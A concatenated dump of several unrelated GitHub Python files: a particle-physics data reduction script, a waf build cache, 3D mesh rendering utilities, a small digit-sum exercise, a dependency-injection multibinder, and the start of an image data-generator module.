sorted(glob('/cms/knash/EOS/QCD_HT1000to1500_TuneCP5_PSWeights_13TeV-madgraphMLM-pythia8/RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-v1_NanoB2GNano2016mc_v1/*/*/*.root'))\n#fnames[\"QCD_HT1500to2000\"]= sorted(glob('/cms/knash/EOS/QCD_HT1500to2000_TuneCP5_PSWeights_13TeV-madgraphMLM-pythia8/RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-v1_NanoB2GNano2016mc_v1/*/*/*.root'))\n#fnames[\"QCD_HT2000toInf\"]= sorted(glob('/cms/knash/EOS/QCD_HT2000toInf_TuneCP5_PSWeights_13TeV-madgraphMLM-pythia8/RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-v1_NanoB2GNano2016mc_v1/*/*/*.root'))\n#fnames[\"TT\"] = sorted(glob('/cms/knash/EOS/ZprimeToTT_M2500_W25_TuneCP2_PSweights_13TeV-madgraph-pythiaMLM-pythia8/RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-v2_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"HgHg_15001400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoHiggs_M1500_M1400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"PgPg_15001400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoPhotons_M1500_M1400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"PgPg_1500400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoPhotons_M1500_M400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"WgWg_15001400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoWs_M1500_M1400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\nfnames[\"WgWg_1500400\"]=sorted(glob('/cms/knash/EOS/SQSQtoqchiqchitoWs_M1500_M400_M200/knash-RunIISummer20UL16MiniAOD-106X_mcRun2_asymptotic_v13-76761e5076679f48cfaad96c1b8156aa_NanoB2GNano2016mc_v1/*/*/*.root'))\n\n\n\n#Do this if accessing over XROOTD\nfileset={}\nfor ffi in fnames:\n #fileset[ffi]=[ffj.replace(\"/eos/uscms/\",\"root://cmsxrootd.fnal.gov///\") for ffj in fnames[ffi]]\n fileset[ffi]=fnames[ffi]\n #fileset[ffi]=fileset[ffi][:10]\n\n#This is the Nano->Parquet file reduction factor\nbatchesperfile={\n \"TT\":3,\n \"HgHg_15001400\":2,\n \"PgPg_15001400\":2,\n \"PgPg_1500400\":2,\n \"WgWg_15001400\":2,\n \"WgWg_1500400\":2,\n \"QCD_HT1500to2000\":5,\n \"QCD_HT1000to1500\":5,\n \"QCD_HT2000toInf\":5}\n\n#Keep only the branches you want \"Jet\",[\"pt\"] would be the branch Jet_pt in the NanoAOD\nbranchestokeep=OrderedDict([(\"FatJet\",[\"pt\",\"eta\",\"phi\",\"mass\",\"msoftdrop\",\"iAEMSE\",\"iAEL0\",\"iAEL1\",\"iAEL2\",\"iAEL3\",\"iAEL4\",\"iAEL5\"]),(\"\",[\"run\",\"luminosityBlock\",\"event\"])])\n#branchestokeep=OrderedDict([(\"LHEPart\",[\"pt\",\"eta\",\"phi\",\"mass\",\"pdgId\",\"status\"]),(\"FatJet\",[\"pt\",\"eta\",\"phi\",\"mass\",\"hadronFlavour\",\"partonFlavour\",\"msoftdrop\",\"iAEMSE\",\"iAEL0\",\"iAEL1\",\"iAEL2\",\"iAEL3\",\"iAEL4\",\"iAEL5\"]),(\"\",[\"run\",\"luminosityBlock\",\"event\"])])\n#branchestokeep=OrderedDict([(\"Muon\",[\"pt\",\"eta\",\"phi\",\"mass\"]),(\"Jet\",[\"pt\",\"eta\",\"phi\",\"mass\"]),(\"FatJet\",[\"pt\",\"eta\",\"phi\",\"mass\",\"hadronFlavour\",\"partonFlavour\",\"msoftdrop\",\"iAEMSE\",\"iAEL0\",\"iAEL1\",\"iAEL2\",\"iAEL3\",\"iAEL4\",\"iAEL5\"]),(\"\",[\"run\",\"luminosityBlock\",\"event\"])])\n\n\n\n\n#Trim out element indices you dont want (ie only keep top 5 jets etc)\nmind={\"FatJet\":5,\"FatJet\":5,\"\":None}\n\n\n#It is possible to pass a column selection here similar to the analyzer. \n#Clearly the syntax is overly complicated compared to the analyzer -- to improve. \n#This is useful for skimming and calculating a value from collections that you dont want to save.\n#ex/calculate ht from ak4 jets, then drop ak4s:\nclass ColumnSelection():\n def __call__(self,df,EventInfo):\n\n htdf=pd.DataFrame()\n htdf[\"ht\"]=df[\"Jet_pt\"].groupby(level=0).sum()\n htdf['subentry'] = 0\n htdf.set_index('subentry', append=True, inplace=True)\n df=pd.concat((df,htdf),axis=1)\n\n df=df.drop([\"Jet_pt\",\"Jet_eta\",\"Jet_phi\",\"Jet_mass\"],axis=1)\n\n return df\n \nskim= [\n PColumn(ColumnSelection()),\n ]\n\n#Run it. nproc is the number of processors. >1 goes into multiprocessing model\n#PNanotoDataFrame(fileset,branchestokeep,filesperchunk=batchesperfile,nproc=1,atype=\"flat\",dirname=\"RooFlatFull\",maxind=mind,seq=skim).Run()\nPNanotoDataFrame(fileset,branchestokeep,filesperchunk=batchesperfile,nproc=2,atype=\"flat\",dirname=\"RooFlatFull\",maxind=mind).Run()\n\n\n\n\n\n\n","repo_name":"knash/AEAnalyzer","sub_path":"RooPandasAnomalyProcessor.py","file_name":"RooPandasAnomalyProcessor.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73479729424","text":"AR = ['/usr/bin/ar']\nARFLAGS = ['rcs']\nBINDIR = '/usr/local/bin'\nCC = ['/usr/bin/gcc']\nCCLNK_SRC_F = []\nCCLNK_TGT_F = ['-o']\nCC_NAME = 'gcc'\nCC_SRC_F = []\nCC_TGT_F = ['-c', '-o']\nCC_VERSION = ('4', '8', '2')\nCFLAGS_MACBUNDLE = ['-fPIC']\nCFLAGS_PYEMBED = ['-fstack-protector', '-fwrapv']\nCFLAGS_PYEXT = ['-fstack-protector', '-fwrapv']\nCFLAGS_SOY = ['-pthread', '-pthread']\nCFLAGS_cshlib = ['-fPIC']\nCOMPILER_CC = 'gcc'\nCPPPATH_ST = '-I%s'\nCXXFLAGS_PYEMBED = ['-fstack-protector', '-fwrapv']\nCXXFLAGS_PYEXT = ['-fstack-protector', '-fwrapv']\nCXXFLAGS_SOY = ['-pthread', '-pthread']\nDEFINES = ['PYTHONDIR=\"/usr/lib/python3/dist-packages\"', 'PYTHONARCHDIR=\"/usr/lib/python3/dist-packages\"', 'HAVE_PYEMBED=1', 'HAVE_PYEXT=1', 'HAVE_PYTHON_H=1']\nDEFINES_PYEMBED = ['HAVE_PYEMBED=1', 'NDEBUG']\nDEFINES_PYEXT = ['HAVE_PYEXT=1', 'NDEBUG']\nDEFINES_SOY = ['HAVE_SOY=1']\nDEFINES_ST = '-D%s'\nDEST_BINFMT = 'elf'\nDEST_CPU = 'x86_64'\nDEST_OS = 'linux'\nHAVE_PYEMBED = 1\nHAVE_PYEXT = 1\nHAVE_SOY = 1\nINCLUDES_PYEMBED = ['/usr/include/python3.4m']\nINCLUDES_PYEXT = ['/usr/include/python3.4m']\nINCLUDES_SOY = ['/usr/local/include', '/usr/include/glib-2.0', '/usr/lib/x86_64-linux-gnu/glib-2.0/include', '/usr/include/gee-0.8', '/usr/include/dbus-1.0', '/usr/include/librsvg-2.0', '/usr/include/nice', '/usr/lib/x86_64-linux-gnu/dbus-1.0/include', '/usr/include/gdk-pixbuf-2.0', '/usr/include/cairo', '/usr/include/libpng12', '/usr/include/pixman-1', '/usr/include/freetype2', '/usr/include/loudmouth-1.0']\nLIBDIR = '/usr/local/lib'\nLIBPATH_PYEMBED = ['/usr/lib/python3.4/config-3.4m-x86_64-linux-gnu', '/usr/lib']\nLIBPATH_PYEXT = ['/usr/lib/python3.4/config-3.4m-x86_64-linux-gnu', '/usr/lib']\nLIBPATH_SOY = ['/usr/local/lib']\nLIBPATH_ST = '-L%s'\nLIB_PYEMBED = ['pthread', 'dl', 'util', 'm', 'python3.4m']\nLIB_PYEXT = ['pthread', 'dl', 'util', 'm', 'python3.4m']\nLIB_SOY = ['soy', 'gee-0.8', 'dbus-glib-1', 'rsvg-2', 'm', 'loudmouth-1', 'idn', 'nice', 'gthread-2.0', 'GLESv2', 'dbus-1', 'gio-2.0', 'gdk_pixbuf-2.0', 'cairo', 'gobject-2.0', 'glib-2.0']\nLIB_ST = '-l%s'\nLINKFLAGS_MACBUNDLE = ['-bundle', '-undefined', 'dynamic_lookup']\nLINKFLAGS_PYEMBED = ['-Xlinker', '-export-dynamic', '-Wl,-O1', '-Wl,-Bsymbolic-functions']\nLINKFLAGS_PYEXT = ['-Xlinker', '-export-dynamic', '-Wl,-O1', '-Wl,-Bsymbolic-functions']\nLINKFLAGS_SOY = ['-pthread', '-Wl,-export-dynamic', '-pthread']\nLINKFLAGS_cshlib = ['-shared']\nLINKFLAGS_cstlib = ['-Wl,-Bstatic']\nLINK_CC = ['/usr/bin/gcc']\nLINUX = 1\nPACKAGE = 'pysoy'\nPKGCONFIG = ['/usr/bin/pkg-config']\nPREFIX = '/usr'\nPYC = 1\nPYFLAGS = ''\nPYFLAGS_OPT = '-O'\nPYO = 1\nPYTAG = 'cpython-34'\nPYTHON = ['/usr/bin/python3']\nPYTHONARCHDIR = '/usr/lib/python3/dist-packages'\nPYTHONDIR = '/usr/lib/python3/dist-packages'\nPYTHON_CONFIG = ['/usr/bin/python3-config']\nPYTHON_VERSION = '3.4'\nRPATH_ST = '-Wl,-rpath,%s'\nSHLIB_MARKER = '-Wl,-Bdynamic'\nSONAME_ST = '-Wl,-h,%s'\nSTLIBPATH_ST = '-L%s'\nSTLIB_MARKER = '-Wl,-Bstatic'\nSTLIB_ST = '-l%s'\ncprogram_PATTERN = '%s'\ncshlib_PATTERN = 'lib%s.so'\ncstlib_PATTERN = 'lib%s.a'\ndefine_key = ['PYTHONDIR', 'PYTHONARCHDIR', 'HAVE_PYEMBED', 'HAVE_PYEXT', 'HAVE_PYTHON_H']\nmacbundle_PATTERN = '%s.bundle'\npyext_PATTERN = '%s.cpython-34m.so'\n","repo_name":"couchjd/Playground","sub_path":"python/libraries/pysoy/build/c4che/_cache.py","file_name":"_cache.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71617852947","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport cv2\nimport code\nimport opendr\nimport math\nfrom opendr.camera import ProjectPoints\nfrom opendr.renderer import ColoredRenderer, TexturedRenderer\nfrom opendr.lighting import LambertianPointLight\nimport random\n\n\n# Rotate the points by a specified angle.\ndef rotateY(points, angle):\n ry = np.array([\n [np.cos(angle), 0., np.sin(angle)], [0., 1., 0.],\n [-np.sin(angle), 0., np.cos(angle)]\n ])\n return np.dot(points, ry)\n\ndef draw_skeleton(input_image, joints, draw_edges=True, vis=None, radius=None):\n \"\"\"\n joints is 3 x 19. but if not will transpose it.\n 0: Right ankle\n 1: Right knee\n 2: Right hip\n 3: Left hip\n 4: Left knee\n 5: Left ankle\n 6: Right wrist\n 7: Right elbow\n 8: Right shoulder\n 9: Left shoulder\n 10: Left elbow\n 11: Left wrist\n 12: Neck\n 13: Head top\n 14: nose\n 15: left_eye\n 16: right_eye\n 17: left_ear\n 18: right_ear\n \"\"\"\n\n if radius is None:\n radius = max(4, (np.mean(input_image.shape[:2]) * 0.01).astype(int))\n\n colors = {\n 'pink': (197, 27, 125), # L lower leg\n 'light_pink': (233, 163, 201), # L upper leg\n 'light_green': (161, 215, 106), # L lower arm\n 'green': (77, 146, 33), # L upper arm\n 'red': (215, 48, 39), # head\n 'light_red': (252, 146, 114), # head\n 'light_orange': (252, 141, 89), # chest\n 'purple': (118, 42, 131), # R lower leg\n 'light_purple': (175, 141, 195), # R upper\n 'light_blue': (145, 191, 219), # R lower arm\n 'blue': (69, 117, 180), # R upper arm\n 'gray': (130, 130, 130), #\n 'white': (255, 255, 255), #\n }\n\n image = input_image.copy()\n input_is_float = False\n\n if np.issubdtype(image.dtype, np.float):\n input_is_float = True\n max_val = image.max()\n if max_val <= 2.: # should be 1 but sometimes it's slightly above 1\n image = (image * 255).astype(np.uint8)\n else:\n image = (image).astype(np.uint8)\n\n if joints.shape[0] != 2:\n joints = joints.T\n joints = np.round(joints).astype(int)\n\n jcolors = [\n 'light_pink', 'light_pink', 'light_pink', 'pink', 'pink', 'pink',\n 'light_blue', 'light_blue', 'light_blue', 'blue', 'blue', 'blue',\n 'purple', 'purple', 'red', 'green', 'green', 'white', 'white',\n 'purple', 'purple', 'red', 'green', 'green', 'white', 'white'\n ]\n\n if joints.shape[1] == 19:\n # parent indices -1 means no parents\n parents = np.array([\n 1, 2, 8, 9, 3, 4, 7, 8, 12, 12, 9, 10, 14, -1, 13, -1, -1, 15, 16\n ])\n # Left is light and right is dark\n ecolors = {\n 0: 'light_pink',\n 1: 'light_pink',\n 2: 'light_pink',\n 3: 'pink',\n 4: 'pink',\n 5: 'pink',\n 6: 'light_blue',\n 7: 'light_blue',\n 8: 'light_blue',\n 9: 'blue',\n 10: 'blue',\n 11: 'blue',\n 12: 'purple',\n 17: 'light_green',\n 18: 'light_green',\n 14: 'purple'\n }\n elif joints.shape[1] == 14:\n parents = np.array([\n 1,\n 2,\n 8,\n 9,\n 3,\n 4,\n 7,\n 8,\n -1,\n -1,\n 9,\n 10,\n 13,\n -1,\n ])\n ecolors = {\n 0: 'light_pink',\n 1: 'light_pink',\n 2: 'light_pink',\n 3: 'pink',\n 4: 'pink',\n 5: 'pink',\n 6: 'light_blue',\n 7: 'light_blue',\n 10: 'light_blue',\n 11: 'blue',\n 12: 'purple'\n }\n elif joints.shape[1] == 21: # hand\n parents = np.array([\n -1,\n 0,\n 1,\n 2,\n 3,\n 0,\n 5,\n 6,\n 7,\n 0,\n 9,\n 10,\n 11,\n 0,\n 13,\n 14,\n 15,\n 0,\n 17,\n 18,\n 19,\n ])\n ecolors = {\n 0: 'light_purple',\n 1: 'light_green',\n 2: 'light_green',\n 3: 'light_green',\n 4: 'light_green',\n 5: 'pink',\n 6: 'pink',\n 7: 'pink',\n 8: 'pink',\n 9: 'light_blue',\n 10: 'light_blue',\n 11: 'light_blue',\n 12: 'light_blue',\n 13: 'light_red',\n 14: 'light_red',\n 15: 'light_red',\n 16: 'light_red',\n 17: 'purple',\n 18: 'purple',\n 19: 'purple',\n 20: 'purple',\n }\n else:\n print('Unknown skeleton!!')\n\n for child in range(len(parents)):\n point = joints[:, child]\n # If invisible skip\n if vis is not None and vis[child] == 0:\n continue\n if draw_edges:\n cv2.circle(image, (point[0], point[1]), radius, colors['white'],\n -1)\n cv2.circle(image, (point[0], point[1]), radius - 1,\n colors[jcolors[child]], -1)\n else:\n # cv2.circle(image, (point[0], point[1]), 5, colors['white'], 1)\n cv2.circle(image, (point[0], point[1]), radius - 1,\n colors[jcolors[child]], 1)\n # cv2.circle(image, (point[0], point[1]), 5, colors['gray'], -1)\n pa_id = parents[child]\n if draw_edges and pa_id >= 0:\n if vis is not None and vis[pa_id] == 0:\n continue\n point_pa = joints[:, pa_id]\n cv2.circle(image, (point_pa[0], point_pa[1]), radius - 1,\n colors[jcolors[pa_id]], -1)\n if child not in ecolors.keys():\n print('bad')\n cv2.line(image, (point[0], point[1]), (point_pa[0], point_pa[1]),\n colors[ecolors[child]], radius - 2)\n\n # Convert back in original dtype\n if input_is_float:\n if max_val <= 1.:\n image = image.astype(np.float32) / 255.\n else:\n image = image.astype(np.float32)\n\n return image\n\ndef draw_text(input_image, content):\n \"\"\"\n content is a dict. draws key: val on image\n Assumes key is str, val is float\n \"\"\"\n image = input_image.copy()\n input_is_float = False\n if np.issubdtype(image.dtype, np.float):\n input_is_float = True\n image = (image * 255).astype(np.uint8)\n\n black = (255, 255, 0)\n margin = 15\n start_x = 5\n start_y = margin\n for key in sorted(content.keys()):\n text = \"%s: %.2g\" % (key, content[key])\n cv2.putText(image, text, (start_x, start_y), 0, 0.45, black)\n start_y += margin\n\n if input_is_float:\n image = image.astype(np.float32) / 255.\n return image\n\ndef visualize_reconstruction_opendr(img, vertices, camera, renderer, color='light_blue', focal_length=1000):\n \"\"\"\n Renderer is an instance of OpenDR Renderer.\n \"\"\"\n # Fix a flength so i can render this with persp correct scale\n res = img.shape[1]\n camera_t = np.array([camera[1], camera[2], 2*focal_length/(res * camera[0] +1e-9)])\n rend_img = renderer.render(vertices, camera_t=camera_t,\n img=img, use_bg=True,\n focal_length=focal_length,\n body_color=color)\n\n combined = np.hstack([img, rend_img])\n\n return combined\n\ndef visualize_reconstruction_multi_view_opendr(img, vertices, camera, renderer, color='light_blue', focal_length=1000):\n # Fix a flength so i can render this with persp correct scale\n res = img.shape[1]\n camera_t = np.array([camera[1], camera[2], 2*focal_length/(res * camera[0] +1e-9)])\n rend_img = renderer.render(vertices, camera_t=camera_t,\n img=img, use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n\n # rotate\n aroundy0 = cv2.Rodrigues(np.array([0, np.radians(0.), 0]))[0]\n aroundy1 = cv2.Rodrigues(np.array([0, np.radians(90.), 0]))[0]\n aroundy2 = cv2.Rodrigues(np.array([0, np.radians(180.), 0]))[0]\n aroundy3 = cv2.Rodrigues(np.array([0, np.radians(270.), 0]))[0]\n aroundy4 = cv2.Rodrigues(np.array([0, np.radians(45.), 0]))[0]\n center = vertices.mean(axis=0)\n rot_vertices0 = np.dot((vertices - center), aroundy0) + center\n rot_vertices1 = np.dot((vertices - center), aroundy1) + center\n rot_vertices2 = np.dot((vertices - center), aroundy2) + center\n rot_vertices3 = np.dot((vertices - center), aroundy3) + center\n rot_vertices4 = np.dot((vertices - center), aroundy4) + center\n \n # # Render non-parametric shape\n img_side0 = renderer.render(rot_vertices0, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n img_side1 = renderer.render(rot_vertices1, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n img_side2 = renderer.render(rot_vertices2, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n img_side3 = renderer.render(rot_vertices3, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n img_side4 = renderer.render(rot_vertices4, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n\n combined = np.hstack([img, rend_img, img_side0, img_side1, img_side2, img_side3, img_side4])\n\n return combined\n\ndef visualize_reconstruction_smpl_opendr(img, vertices, camera, renderer, smpl_vertices, color='light_blue', focal_length=1000):\n # Fix a flength so i can render this with persp correct scale\n res = img.shape[1]\n camera_t = np.array([camera[1], camera[2], 2*focal_length/(res * camera[0] +1e-9)])\n rend_img = renderer.render(vertices, camera_t=camera_t,\n img=img, use_bg=True,\n focal_length=focal_length,\n body_color=color)\n \n rend_img_smpl = renderer.render(smpl_vertices, camera_t=camera_t,\n img=img, use_bg=True,\n focal_length=focal_length,\n body_color=color)\n\n combined = np.hstack([img, rend_img, rend_img_smpl])\n\n return combined\n\n\ndef cam2pixel(cam_coord, f, c):\n x = cam_coord[:, 0] / (cam_coord[:, 2]) * f[0] + c[0]\n y = cam_coord[:, 1] / (cam_coord[:, 2]) * f[1] + c[1]\n z = cam_coord[:, 2]\n img_coord = np.concatenate((x[:,None], y[:,None], z[:,None]),1)\n return img_coord\n\n\nclass OpenDR_Renderer(object):\n \"\"\"\n Render mesh using OpenDR for visualization.\n \"\"\"\n\n def __init__(self, width=800, height=600, near=0.5, far=1000, faces=None):\n self.colors = {'hand': [.9, .9, .9], 'pink': [.9, .7, .7], 'light_blue': [0.65098039, 0.74117647, 0.85882353] }\n self.width = width\n self.height = height\n self.faces = faces\n self.renderer = ColoredRenderer()\n\n def render(self, vertices, faces=None, img=None,\n camera_t=np.zeros([3], dtype=np.float32),\n camera_rot=np.zeros([3], dtype=np.float32),\n camera_center=None,\n use_bg=False,\n bg_color=(0.0, 0.0, 0.0),\n body_color=None,\n focal_length=5000,\n disp_text=False,\n gt_keyp=None,\n pred_keyp=None,\n **kwargs):\n if img is not None:\n height, width = img.shape[:2]\n else:\n height, width = self.height, self.width\n\n if faces is None:\n faces = self.faces\n\n if camera_center is None:\n camera_center = np.array([width * 0.5,\n height * 0.5])\n\n self.renderer.camera = ProjectPoints(rt=camera_rot,\n t=camera_t,\n f=focal_length * np.ones(2),\n c=camera_center,\n k=np.zeros(5))\n dist = np.abs(self.renderer.camera.t.r[2] -\n np.mean(vertices, axis=0)[2])\n far = dist + 20\n\n self.renderer.frustum = {'near': 1.0, 'far': far,\n 'width': width,\n 'height': height}\n\n if img is not None:\n if use_bg:\n self.renderer.background_image = img\n else:\n self.renderer.background_image = np.ones_like(\n img) * np.array(bg_color)\n\n if body_color is None:\n color = self.colors['light_blue']\n else:\n color = self.colors[body_color]\n\n if isinstance(self.renderer, TexturedRenderer):\n color = [1.,1.,1.]\n\n self.renderer.set(v=vertices, f=faces,\n vc=color, bgcolor=np.ones(3))\n albedo = self.renderer.vc\n # Construct Back Light (on back right corner)\n yrot = np.radians(120)\n\n self.renderer.vc = LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([-200, -100, -100]), yrot),\n vc=albedo,\n light_color=np.array([1, 1, 1]))\n\n # Construct Left Light\n self.renderer.vc += LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([800, 10, 300]), yrot),\n vc=albedo,\n light_color=np.array([1, 1, 1]))\n\n # Construct Right Light\n self.renderer.vc += LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([-500, 500, 1000]), yrot),\n vc=albedo,\n light_color=np.array([.7, .7, .7]))\n\n return self.renderer.r\n\n\n def render_vertex_color(self, vertices, faces=None, img=None,\n camera_t=np.zeros([3], dtype=np.float32),\n camera_rot=np.zeros([3], dtype=np.float32),\n camera_center=None,\n use_bg=False,\n bg_color=(0.0, 0.0, 0.0),\n vertex_color=None,\n focal_length=5000,\n disp_text=False,\n gt_keyp=None,\n pred_keyp=None,\n **kwargs):\n if img is not None:\n height, width = img.shape[:2]\n else:\n height, width = self.height, self.width\n\n if faces is None:\n faces = self.faces\n\n if camera_center is None:\n camera_center = np.array([width * 0.5,\n height * 0.5])\n\n self.renderer.camera = ProjectPoints(rt=camera_rot,\n t=camera_t,\n f=focal_length * np.ones(2),\n c=camera_center,\n k=np.zeros(5))\n dist = np.abs(self.renderer.camera.t.r[2] -\n np.mean(vertices, axis=0)[2])\n far = dist + 20\n\n self.renderer.frustum = {'near': 1.0, 'far': far,\n 'width': width,\n 'height': height}\n\n if img is not None:\n if use_bg:\n self.renderer.background_image = img\n else:\n self.renderer.background_image = np.ones_like(\n img) * np.array(bg_color)\n\n if vertex_color is None:\n vertex_color = self.colors['light_blue']\n\n\n self.renderer.set(v=vertices, f=faces,\n vc=vertex_color, bgcolor=np.ones(3))\n albedo = self.renderer.vc\n # Construct Back Light (on back right corner)\n yrot = np.radians(120)\n\n self.renderer.vc = LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([-200, -100, -100]), yrot),\n vc=albedo,\n light_color=np.array([1, 1, 1]))\n\n # Construct Left Light\n self.renderer.vc += LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([800, 10, 300]), yrot),\n vc=albedo,\n light_color=np.array([1, 1, 1]))\n\n # Construct Right Light\n self.renderer.vc += LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([-500, 500, 1000]), yrot),\n vc=albedo,\n light_color=np.array([.7, .7, .7]))\n\n return self.renderer.r","repo_name":"postech-ami/FastMETRO","sub_path":"src/utils/renderer_opendr.py","file_name":"renderer_opendr.py","file_ext":"py","file_size_in_byte":17822,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"48"} +{"seq_id":"11450658600","text":"def module():\r\n numb = input(\"Введіть число \")\r\n str_numb = str(numb)\r\n sum1 = 0\r\n for i in range(len(str_numb)):\r\n sum1+= int(str_numb[i])\r\n print(\"Сума \", sum1)\r\n max1 = max(numb)\r\n min1 = min(numb)\r\n print(\"Максимальна цифра \", max1)\r\n print(\"Мінімальна цифра \", min1)\r\n return(module)\r\nmodule() ","repo_name":"MaksKulinich/MKG","sub_path":"modulelab.py","file_name":"modulelab.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25585217868","text":"from snakeguice import providers\nfrom snakeguice.annotation import Annotation\nfrom snakeguice.binder import Key\nfrom snakeguice.decorators import inject\nfrom snakeguice.interfaces import Injector\nfrom snakeguice.errors import MultiBindingError\n\n\nclass _MultiBinder(object):\n\n def __init__(self, binder, interface):\n self._binder = binder\n self._interface = interface\n self._provider = self._get_or_create_provider()\n\n def _get_or_create_provider(self):\n key = Key(self.multibinding_type(self._interface))\n binding = self._binder.get_binding(key)\n if not binding:\n self._binder.bind(self.multibinding_type(self._interface),\n to_provider=self._create_provider())\n binding = self._binder.get_binding(key)\n return binding.provider\n\n def _dsl_to_provider(self, to, to_provider, to_instance):\n if to:\n #TODO: add some validation\n return providers.create_simple_provider(to)\n elif to_provider:\n #TODO: add some validation\n return to_provider\n elif to_instance:\n #TODO: add some validation\n return providers.create_instance_provider(to_instance)\n else:\n raise MultiBindingError('incorrect arguments to %s.add_binding'\n % self.__class__.__name__)\n\n\nclass List(Annotation):\n \"\"\"Used for binding lists.\"\"\"\n\n\nclass ListBinder(_MultiBinder):\n\n multibinding_type = List\n\n def add_binding(self, to=None, to_provider=None, to_instance=None):\n provider = self._dsl_to_provider(to, to_provider, to_instance)\n self._provider.add_provider(provider)\n\n def _create_provider(self):\n class DynamicMultiBindingProvider(object):\n providers = []\n\n @inject(injector=Injector)\n def __init__(self, injector):\n self._injector = injector\n\n @classmethod\n def add_provider(cls, provider):\n cls.providers.append(provider)\n\n def get(self):\n return [self._injector.get_instance(p).get()\n for p in self.providers]\n\n return DynamicMultiBindingProvider\n\n\nclass Dict(Annotation):\n \"\"\"Used for binding dictionaries.\"\"\"\n\n\nclass DictBinder(_MultiBinder):\n\n multibinding_type = Dict\n\n def add_binding(self, key, to=None, to_provider=None, to_instance=None):\n provider = self._dsl_to_provider(to, to_provider, to_instance)\n self._provider.add_provider(key, provider)\n\n def _create_provider(self):\n binder_self = self\n\n class DynamicMultiBindingProvider(object):\n providers = {}\n\n @inject(injector=Injector)\n def __init__(self, injector):\n self._injector = injector\n\n @classmethod\n def add_provider(cls, key, provider):\n if key in cls.providers:\n msg = ('duplicate binding for %r in Dict(%s) found'\n % (key, binder_self.interface.__class__.__name__))\n raise MultiBindingError(msg)\n cls.providers[key] = provider\n\n def get(self):\n return dict([(k, self._injector.get_instance(p).get())\n for k, p in self.providers.items()])\n\n return DynamicMultiBindingProvider\n","repo_name":"dstanek/snake-guice.orig","sub_path":"snakeguice/multibinder.py","file_name":"multibinder.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"20636476039","text":"import numpy as np\nimport sys\nfrom keras import backend as K\nfrom custom_image import (ImageDataGenerator, \n standardize, \n random_transform, \n random_crop, \n center_crop, \n pick_channels, \n get_max_class,\n get_soft_class)\nimport tensorflow as tf\nimport pickle\nimport os\nimport tables\n\ndef _pickle_fit_vars(path, fit_vars):\n data_file = open(path, 'wb')\n pickle.dump(fit_vars, data_file)\n data_file.close()\n\ndef _preload_data(data_dir, read_format='tbl'):\n \"\"\"Utility function which preloads the data from the directory\n \"\"\"\n X = []\n #if data_dir == 'masks/':\n # running_sum = np.zeros(10)\n #else:\n # running_sum = np.zeros(20)\n for im in os.listdir(data_dir):\n print('Preloading image {}'.format(im))\n if read_format == 'npy':\n x = np.load(os.path.join(data_dir, im))\n elif read_format == 'tbl':\n with tables.open_file(os.path.join(data_dir, im), 'r') as h5_file:\n x = h5_file.root.carray.read()\n #running_sum += np.sum(x, axis=(0,1))\n X.append(x)\n\n \n #print((3349*3389*25-np.sum(running_sum))/running_sum)\n\n return np.asarray(X)\n\ndef setup_generator(data_dir,\n batch_size=1,\n augment=False,\n shape_gen=(572,572),\n shape_gen_out=None,\n mask_channels=None,\n seed=0,\n verbose=1,\n norm_gen=True,\n classify=None,\n preload=False,\n read_format='tbl'):\n \"\"\"Utility function to help set up generators\n \"\"\"\n\n if augment:\n datagen = ImageDataGenerator(\n 